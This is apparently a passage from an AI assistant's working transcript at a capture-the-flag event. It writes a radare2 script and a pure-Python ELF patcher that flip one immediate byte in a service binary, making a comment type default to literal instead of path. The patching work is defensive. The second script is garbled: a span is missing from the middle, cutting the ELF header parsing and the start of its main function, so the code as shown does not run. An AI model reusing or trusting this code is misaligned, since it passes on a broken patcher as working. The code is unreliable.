r2pipe # type: ignore INIT_DEFAULT_META_VA = 0x45F24D # address of: *((_BYTE *)v16 + 48) = 2; def parse_mov_imm8_disasm(disasm: str) -> Tuple[str, str]: """Extract memory operand and immediate from a mov byte instruction disasm. Example disasm: 'mov byte [rdi+0x30], 0x2' Returns: (memop, imm) e.g., ('[rdi+0x30]', '0x2') """ m = re.search(r"mov\s+byte\s+([^,]+),\s*([^\s]+)$", disasm) if not m: raise ValueError(f"Unexpected instruction format: {disasm}") return m.group(1).strip(), m.group(2).strip() def main() -> None: path = sys.argv[1] if len(sys.argv) > 1 else os.path.join(os.getcwd(), "ico") if not os.path.isfile(path): print(f"error: binary not found: {path}") sys.exit(1) backup = path + ".bak" if not os.path.exists(backup): shutil.copy2(path, backup) print(f"backup created: {backup}") r2 = r2pipe.open(path, flags=["-w"]) try: r2.cmd("aaa") # analyze r2.cmd(f"s {INIT_DEFAULT_META_VA}") before = r2.cmdj("aoj 1") if not before: raise RuntimeError("Failed to read instruction at target VA") dis = before[0].get("disasm", "").strip() print(f"before: {dis}") memop, imm = parse_mov_imm8_disasm(dis) if imm.lower() in ("2", "0x2"): new_dis = f"mov byte {memop}, 1" else: # Already patched or unexpected immediate; still force to 1 new_dis = f"mov byte {memop}, 1" r2.cmd(f"wa {new_dis} @ {INIT_DEFAULT_META_VA}") after = r2.cmdj("aoj 1")[0].get("disasm", "").strip() print(f"after: {after}") if "mov byte" not in after or ", 0x1" not in after and after.endswith(", 1") is False: print("warning: patch may not have applied as intended; verify manually") else: print("patch applied: default comment type set to 1 (literal)") finally: r2.quit() if __name__ == "__main__": main() ``` ```python #!/usr/bin/env python3 """ Minimal, pure-Python patcher for 'ico' to disable comment-as-path default. It flips the immediate '2' -> '1' in the instruction at VA 0x45F24D: mov byte [+0x30], 0x2 ; sets comment type to PATH (2) We change the imm8 to 0x1 so comment type defaults to LITERAL (1). Implementation details: - Computes file offset of the VA via ELF program headers (PT_LOAD mapping) - Writes one byte at (file_off + 3), since the encoding is: C6 .. .. Usage: python3 patch_simple.py /path/to/ico Creates /path/to/ico.bak backup. """ import os import shutil import struct import sys from typing import Tuple TARGET_VA = 0x45F24D # start of 'mov byte [*+0x30], 0x2' IMM_DELTA = 3 # imm8 is the 4th byte in typical encoding C6 ?? disp8 imm8 def elf64_read_phdr_mapping(f) -> Tuple[int, int, int]: f.seek(0) ehdr = f.read(0x40) if len(ehdr) < 0x40 or ehdr[:4] != b"\x7fELF": raise RuntimeError("not an ELF file") ei_class = ehdr[4] ei_data = ehdr[5] if ei_class != 2 or ei_data != 1: raise RuntimeError("expected ELF64 little-endian") e_phoff = struct.unpack_from(" None: path = sys.argv[1] if len(sys.argv) > 1 else "ico" if not os.path.isfile(path): print(f"error: binary not found: {path}") sys.exit(1) backup = path + ".bak" if not os.path.exists(backup): shutil.copy2(path, backup) print(f"backup created: {backup}") with open(path, "r+b") as f: p_offset, p_vaddr, _ = elf64_read_phdr_mapping(f) file_off = p_offset + (TARGET_VA - p_vaddr) imm_off = file_off + IMM_DELTA f.seek(file_off) insn = f.read(8) if len(insn) < 4: raise RuntimeError("failed to read instruction bytes") # Sanity: first byte should be 0xC6 (mov r/m8, imm8) in typical codegen # and the current imm8 should be 0x02. ok = True if insn[0] != 0xC6: print("warning: opcode 0xC6 not found at target; proceeding anyway") ok = False if insn[3] != 0x02: print(f"warning: unexpected imm8 {insn[3]:#x} at target; proceeding anyway") ok = False print(f"before bytes: {insn[:4].hex()}") # Write imm8 = 0x01 f.seek(imm_off) f.write(b"\x01") f.seek(file_off) after = f.read(4) print(f"after bytes: {after.hex()}") if ok and after[0] == 0xC6 and after[3] == 0x01: print("patch applied: default comment type now 1 (literal)") else: print("patch written; verify in a disassembler") if __name__ == "__main__": main() ``` - Wrote a pure-Python patcher `patch_simple.py` that flips the default comment type from 2 (path) to 1 (literal) at VA 0x45F24D. It uses ELF parsing, no external tools. - Ran it; it patched the byte sequence from c6403002 to c6403001 and created a backup `ico.bak`. How to use: - python3 patch_simple.py /home/clasm/ctfs/dc-finals-25/ico/ico - Restart the service binary. The 0x22 default will no longer be path mode, so the comment path trick is disabled. If you want, I can add Option A patch as well (kill the type=2 path read in `get_comment_value`) with a second pure-Python patch.